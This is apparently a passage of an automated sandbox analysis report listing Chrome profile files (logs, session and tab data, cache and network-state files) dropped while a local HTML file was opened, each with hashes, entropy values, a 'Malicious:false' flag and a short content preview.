                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOG.oldld (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):324
                                                                                                                                                                Entropy (8bit):5.145831994138907
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:m+oCq2PlLN23iKKdKrQMxIFUtpvonVXZmwPvoZ47kwOlLN23iKKdKrQMFLJ:wCvy5KkCFUtpgVX/PgK5L5KktJ
                                                                                                                                                                MD5:0C18540842503F807DF96FB2275A9AFE
                                                                                                                                                                SHA1:67286C038A87EF157F5CDAEF7C08512EA3B9B6FE
                                                                                                                                                                SHA-256:43D6C924F74CE90589C7FDE3C12DB874906F2AF8C839343B3A9B835B41750CB2
                                                                                                                                                                SHA-512:B958DB49FCC2B6385D7663A5B9F90A455FC67E3B2FFC5D6ABFC91257405BAA031769B4E751C46634CCB75E7A4F54DAD937D018513A38FDAEE4866A93904C6439
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:10:31.557 1e80 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage/MANIFEST-000001.2021/08/16-19:10:31.564 1e80 Recovering log #3.2021/08/16-19:10:31.565 1e80 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\Session_13273639832636384
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):3213
                                                                                                                                                                Entropy (8bit):3.193881839874912
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:3iYXxxP8zDRKIAnKU8CJ318BZD1C/BHUWKI8cZ6yU9czpzxR0M:3iq8fRKIm8CJF8BdI/Z8cZx
                                                                                                                                                                MD5:82032E42016A7BBD806A2457E9C1D0C4
                                                                                                                                                                SHA1:4D07894B452EE1A9BD7E5E4162D816D4D6B14E7F
                                                                                                                                                                SHA-256:1D093956AC91E44595D20944B4E04472B74EF061A90E359E9BA3089E23D0456F
                                                                                                                                                                SHA-512:BEE767BFC85ED9F2ECD0CF62CE7B26EE72A32FE34AC45B4E0DCBA5D3C1F61D3624EB4066A134D4AB3F52E2C52F581404FF395E90633344597A9EB7359A2282CA
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: SNSS............................................... ..............................!.............................................1..,.......$...6f372e88_0164_49ba_b9fe_49d1a9439e9c......................S..........................................................................................................9..4...........*...file:///C:/Users/user/Desktop/file.html......|...x.......p...........................................x...........................................................................0...............(.......................................\...*...f.i.l.e.:./././.C.:./.U.s.e.r.s./.a.l.f.r.e.d.o./.D.e.s.k.t.o.p./.f.i.l.e...h.t.m.l.....................................8.......0.......8....................................................................... .......................................................P...$...5.1.9.6.6.9.f.3.-.8.f.4.6.-.4.e.5.2.-.9.0.f.b.-.5.e.0.b.b.3.4.1.4.5.d.d.................P...$...2.a.f.4.d.e.5.4.-.f.5.8.9.-.4.f.e.c.-.9.2.a.c.-.4.0.e.e.d
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\Tabs_13273639833235706
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):6844
                                                                                                                                                                Entropy (8bit):3.144590886228538
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:3bKy92yDnlI55mpS2bT7Pm/Xb15sVWKeYSZ:31LxI5+rVW/Z
                                                                                                                                                                MD5:CEB9E8FA103979013E4D8181665CAB7B
                                                                                                                                                                SHA1:03272F8AC30B053C05353AE32C422D1D52BAEAFC
                                                                                                                                                                SHA-256:2DB778CE4EE2FA390476E8621F8283D0BCAE0BF06D4B88BFD635916E13221CC4
                                                                                                                                                                SHA-512:D5FD7431D4BAA2B22AAEAD5AB367E18E54452371580F002F30E2BD3BDD0B32C0316F4524CC08D811D92BF358B4873C7DBF28F4FE94BFB30DAF28E5E1514FE87C
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: SNSS...............s.k.."/.M..H...............chrome://welcome/.......W.e.l.c.o.m.e. .t.o. .C.h.r.o.m.e...................................................x.......p.......................................................l.D.B...m.D.B... .......8.......8.......H...............................*.......c.h.r.o.m.e.:././.w.e.l.c.o.m.e./...........................................................o".route".landing".step".landing{...........8.......0.......8....................................................................... ...............................................chrome://welcome................P...$...4.a.a.d.f.5.d.b.-.2.6.5.a.-.4.e.9.f.-.a.1.9.b.-.9.f.f.4.d.3.5.1.1.6.4.b.................P...$...8.5.e.e.d.4.1.b.-.e.5.c.1.-.4.3.5.0.-.8.2.e.e.-.c.1.4.b.f.d.f.4.c.4.a.1.....................chrome://welcome/............"/....................."/............."/........................chrome://welcome/new-user...>...W.e.l.c.o.m.e. .t.o. .C.h.r.o.m.e. .-. .A.d.d. .b.o.o.k.m.a.r.k.s. .t.o. .y
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOG
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):352
                                                                                                                                                                Entropy (8bit):5.080287839623628
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:m+oeZq2PlLN23iKKdK7Uh2ghZIFUtpvo8OvZZmwPvo+vzkwOlLN23iKKdK7Uh2gd:wUvy5KkIhHh2FUtpgZvZ/Pg+75L5KkIT
                                                                                                                                                                MD5:B19D4A7E6A3A8A43352C94ED459FD4F7
                                                                                                                                                                SHA1:55AF2297E590934396E3EB9754606D3E745A2333
                                                                                                                                                                SHA-256:88E51B95684452312DEDDCD7EB38EACB89B750DDFEDB8037CDA2978043C2FD3E
                                                                                                                                                                SHA-512:8E2D724A93308A1003A27B8030AF065CA7AF548A154681F0790C0788D6919B9250F67AE10BC07D671715A796ADCD87922DD8AE6E49CBE91836069D81DF9E4563
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:10:30.126 1ce0 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database/MANIFEST-000001.2021/08/16-19:10:30.133 1ce0 Recovering log #3.2021/08/16-19:10:30.138 1ce0 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOG.old (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):352
                                                                                                                                                                Entropy (8bit):5.080287839623628
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:m+oeZq2PlLN23iKKdK7Uh2ghZIFUtpvo8OvZZmwPvo+vzkwOlLN23iKKdK7Uh2gd:wUvy5KkIhHh2FUtpgZvZ/Pg+75L5KkIT
                                                                                                                                                                MD5:B19D4A7E6A3A8A43352C94ED459FD4F7
                                                                                                                                                                SHA1:55AF2297E590934396E3EB9754606D3E745A2333
                                                                                                                                                                SHA-256:88E51B95684452312DEDDCD7EB38EACB89B750DDFEDB8037CDA2978043C2FD3E
                                                                                                                                                                SHA-512:8E2D724A93308A1003A27B8030AF065CA7AF548A154681F0790C0788D6919B9250F67AE10BC07D671715A796ADCD87922DD8AE6E49CBE91836069D81DF9E4563
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:10:30.126 1ce0 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database/MANIFEST-000001.2021/08/16-19:10:30.133 1ce0 Recovering log #3.2021/08/16-19:10:30.138 1ce0 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\9c0bcb03-db83-4204-bcfc-1c915b9170f8.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):139
                                                                                                                                                                Entropy (8bit):4.762700853527964
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJqjn1KKtiKnMb1KKtiVY:YHpoeS7PMVKJw1K3KnMRK3VY
                                                                                                                                                                MD5:038931FF72A0C6AA0695A404960B1B22
                                                                                                                                                                SHA1:90802F36B75C3CA70FC8CD1CF8BDFBAE0E8723A4
                                                                                                                                                                SHA-256:BEF93811AE263E2E9145A44205340015843B1D4485D084BB642EAEB500FE564C
                                                                                                                                                                SHA-512:97903821D21BB748255C29BE83BCA5BE61E0E36719050D4BB780EBC35424202A23F3ED4EE0056833E7748F1D55D82A5F38476298C5012202776BEA411DA7001E
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAASABiAgICA+P////8B":"4G","CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\GPUCache\data_1
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):270336
                                                                                                                                                                Entropy (8bit):0.0012471779557650352
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Local Storage\leveldb\LOG
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):434
                                                                                                                                                                Entropy (8bit):5.2079616022829
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:wlQ+vy5KkFFUtpgEuGKW/PgiQV5L5KkOJ:w5y5KkfgcGKmSL5KkK
                                                                                                                                                                MD5:0250667A023E9A727239F40413BF4122
                                                                                                                                                                SHA1:B9B0CA9B70630109343DBD06525D3DC9C083C6C3
                                                                                                                                                                SHA-256:F1BBB24DF40767DED9BE27AD392C11E29C14FEF3D88929267DE51EECC1F5E327
                                                                                                                                                                SHA-512:0DE0E41DA0765030964434794C688DF874FBE79F55F4A53C5B8BCA290AD41E32B886E536DF6F1CD7A575ECF196701DE06F59F944A80425B7E410EE138BB641D4
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:10:31.569 1eec Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Local Storage\leveldb/MANIFEST-000001.2021/08/16-19:10:31.570 1eec Recovering log #3.2021/08/16-19:10:31.571 1eec Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Local Storage\leveldb\LOG.old (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):434
                                                                                                                                                                Entropy (8bit):5.2079616022829
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:wlQ+vy5KkFFUtpgEuGKW/PgiQV5L5KkOJ:w5y5KkfgcGKmSL5KkK
                                                                                                                                                                MD5:0250667A023E9A727239F40413BF4122
                                                                                                                                                                SHA1:B9B0CA9B70630109343DBD06525D3DC9C083C6C3
                                                                                                                                                                SHA-256:F1BBB24DF40767DED9BE27AD392C11E29C14FEF3D88929267DE51EECC1F5E327
                                                                                                                                                                SHA-512:0DE0E41DA0765030964434794C688DF874FBE79F55F4A53C5B8BCA290AD41E32B886E536DF6F1CD7A575ECF196701DE06F59F944A80425B7E410EE138BB641D4
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:10:31.569 1eec Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Local Storage\leveldb/MANIFEST-000001.2021/08/16-19:10:31.570 1eec Recovering log #3.2021/08/16-19:10:31.571 1eec Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Network Persistent Statemp (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):139
                                                                                                                                                                Entropy (8bit):4.762700853527964
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJqjn1KKtiKnMb1KKtiVY:YHpoeS7PMVKJw1K3KnMRK3VY
                                                                                                                                                                MD5:038931FF72A0C6AA0695A404960B1B22
                                                                                                                                                                SHA1:90802F36B75C3CA70FC8CD1CF8BDFBAE0E8723A4
                                                                                                                                                                SHA-256:BEF93811AE263E2E9145A44205340015843B1D4485D084BB642EAEB500FE564C
                                                                                                                                                                SHA-512:97903821D21BB748255C29BE83BCA5BE61E0E36719050D4BB780EBC35424202A23F3ED4EE0056833E7748F1D55D82A5F38476298C5012202776BEA411DA7001E
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAASABiAgICA+P////8B":"4G","CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage\000001.dbtmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):16
                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: MANIFEST-000001.
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage\000003.log
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):61
                                                                                                                                                                Entropy (8bit):3.7273991737283296
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:S8ltHlS+QUl1ASEGhTFl:S85aEFl
                                                                                                                                                                MD5:9F7EADC15E13D0608B4E4D590499AE2E
                                                                                                                                                                SHA1:AFB27F5C20B117031328E12DD3111A7681FF8DB5
                                                                                                                                                                SHA-256:5C3A5B578AB9FE853EAD7040BC161929EA4F6902073BA2B8BB84487622B98923
                                                                                                                                                                SHA-512:88455784C705F565C70FA0A549C54E2492976E14643E9DD0A8E58C560D003914313DF483F096BD33EC718AEEC7667B8DE063A73627AA3436BA6E7E562E565B3F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: *...#................version.1..namespace-..&f...............
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage\CURRENT (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):16
                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: MANIFEST-000001.
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage\LOG
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):381
                                                                                                                                                                Entropy (8bit):5.181504084809113
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:m+Kdp1lLN23iKKdKusNpZQM72KLlZvE/MQL+q2PlLN23iKKdKusNpZQMxIFUv:idu5KkxLPHQ+vy5KkMFUv
                                                                                                                                                                MD5:A991A38853CB053A49FCFC51D7D7EA47
                                                                                                                                                                SHA1:6E6909EC0BDEB82B6B7A6FE729ED39807100C664
                                                                                                                                                                SHA-256:0BCA3ABDEF33369A2079D5807DB65C2687FCFAD9B3032091F5C47D8DC511D9DC
                                                                                                                                                                SHA-512:D320FA43AF97DC7E828AC3A76D0954D2F30A39D5FC50903542991ECCA0EFA8C6F32E215D996793FBFE6C786FD45DA956F77987EACCD64E7590B18CBE42319B01
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:10:47.686 1eec Creating DB C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage since it was missing..2021/08/16-19:10:49.268 1eec Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage/MANIFEST-000001.
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage\LOG.old (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):381
                                                                                                                                                                Entropy (8bit):5.181504084809113
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:m+Kdp1lLN23iKKdKusNpZQM72KLlZvE/MQL+q2PlLN23iKKdKusNpZQMxIFUv:idu5KkxLPHQ+vy5KkMFUv
                                                                                                                                                                MD5:A991A38853CB053A49FCFC51D7D7EA47
                                                                                                                                                                SHA1:6E6909EC0BDEB82B6B7A6FE729ED39807100C664
                                                                                                                                                                SHA-256:0BCA3ABDEF33369A2079D5807DB65C2687FCFAD9B3032091F5C47D8DC511D9DC
                                                                                                                                                                SHA-512:D320FA43AF97DC7E828AC3A76D0954D2F30A39D5FC50903542991ECCA0EFA8C6F32E215D996793FBFE6C786FD45DA956F77987EACCD64E7590B18CBE42319B01
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:10:47.686 1eec Creating DB C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage since it was missing..2021/08/16-19:10:49.268 1eec Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage/MANIFEST-000001.
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage\MANIFEST-000001
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:PGP\011Secret Key -
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):41
                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: .|.."....leveldb.BytewiseComparator......
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\5705025f-b2f6-44c4-a83e-dc843ee7c0bf.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:modified
                                                                                                                                                                Size (bytes):139
                                                                                                                                                                Entropy (8bit):4.762700853527964
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJqjn1KKtiKnMb1KKtiVY:YHpoeS7PMVKJw1K3KnMRK3VY
                                                                                                                                                                MD5:038931FF72A0C6AA0695A404960B1B22
                                                                                                                                                                SHA1:90802F36B75C3CA70FC8CD1CF8BDFBAE0E8723A4
                                                                                                                                                                SHA-256:BEF93811AE263E2E9145A44205340015843B1D4485D084BB642EAEB500FE564C
                                                                                                                                                                SHA-512:97903821D21BB748255C29BE83BCA5BE61E0E36719050D4BB780EBC35424202A23F3ED4EE0056833E7748F1D55D82A5F38476298C5012202776BEA411DA7001E
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAASABiAgICA+P////8B":"4G","CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache\data_1
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):270336
                                                                                                                                                                Entropy (8bit):0.0012471779557650352
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\LOG
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):434
                                                                                                                                                                Entropy (8bit):5.1341619092428425
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:4GQ+vy5KkkGHArBFUtpeMGKW/PM4pQV5L5KkkGHAryJ:4G5y5KkkGgPglGKepSL5KkkGga
                                                                                                                                                                MD5:F6A2A8A8516A9DED62607BBFB155F735
                                                                                                                                                                SHA1:A80F28A94554DAC33C82A0B018658E34A48B551B
                                                                                                                                                                SHA-256:6A1D90AB5A83646552B1FAE8927251D8E8DDF11DFD4D1DBE9388D97D787968A3
                                                                                                                                                                SHA-512:5016B94A232C30563251B8C2B5039288E99C8C44C6C400E236995CFF27C0876EFFE6FF12F96B86486301F867E79885D60633F71008F94D349BC023D53D897933
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:11:41.830 1eec Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb/MANIFEST-000001.2021/08/16-19:11:41.832 1eec Recovering log #3.2021/08/16-19:11:41.834 1eec Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\LOG.oldx (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):434
                                                                                                                                                                Entropy (8bit):5.1341619092428425
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:4GQ+vy5KkkGHArBFUtpeMGKW/PM4pQV5L5KkkGHAryJ:4G5y5KkkGgPglGKepSL5KkkGga
                                                                                                                                                                MD5:F6A2A8A8516A9DED62607BBFB155F735
                                                                                                                                                                SHA1:A80F28A94554DAC33C82A0B018658E34A48B551B
                                                                                                                                                                SHA-256:6A1D90AB5A83646552B1FAE8927251D8E8DDF11DFD4D1DBE9388D97D787968A3
                                                                                                                                                                SHA-512:5016B94A232C30563251B8C2B5039288E99C8C44C6C400E236995CFF27C0876EFFE6FF12F96B86486301F867E79885D60633F71008F94D349BC023D53D897933
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:11:41.830 1eec Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb/MANIFEST-000001.2021/08/16-19:11:41.832 1eec Recovering log #3.2021/08/16-19:11:41.834 1eec Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network Persistent Statemp (copy)
